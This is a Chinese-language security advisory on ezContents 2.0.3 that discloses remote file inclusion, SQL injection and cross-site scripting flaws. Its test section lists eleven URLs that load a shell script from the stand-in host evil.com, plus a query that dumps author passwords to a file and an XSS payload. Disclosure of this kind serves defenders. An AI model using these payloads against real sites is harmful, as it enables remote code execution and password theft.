安全研究
安全漏洞
ezContents多个SQL注入、远程/本地文件包含和跨站脚本漏洞
发布日期:2006-08-31
更新日期:2006-09-01
受影响系统:
VisualShapers ezContents 2.0.3描述:
BUGTRAQ ID: 19780,19777,19776
ezContents是一款开放源代码内容管理系统。
ezContents中存在多个输入验证错误,具体如下:
1) modules/moduleSec.php文件的moduleExternalLink()函数中的漏洞允许攻击者使用ftps协议包含本地或外部资源的任意文件。include/functions.php文件中的isExternalLink()函数和admin/adminbutton.php中的adminExternalLink()函数也存在同样问题。
2) 没有正确的过滤headeruserdata.php文件中的groupname参数输入,允许攻击者通过注入任意SQL代码控制SQL查询。
3) 没有正确的过滤loginreg2.php文件中对subgroupname参数的输入,允许攻击者在用户浏览器会话中执行任意HTML和脚本代码。
<*来源:DarkFig (gmdarkfig@gmail.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0292.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
=================================
http://[...]/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/calendar/calendar.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/links/showlinks.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/poll/showpoll.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/search/search.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/whatsnew/whatsnew.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
SQL注入
=================
http://[...]/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' #
跨站脚本
========================
http://[...]/loginreq2.php?subgroupname="><script>alert(666)</script>
建议:
厂商补丁:
VisualShapers
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.visualshapers.com/
浏览次数:3148
严重程度:0(网友投票)
绿盟科技给您安全的保障
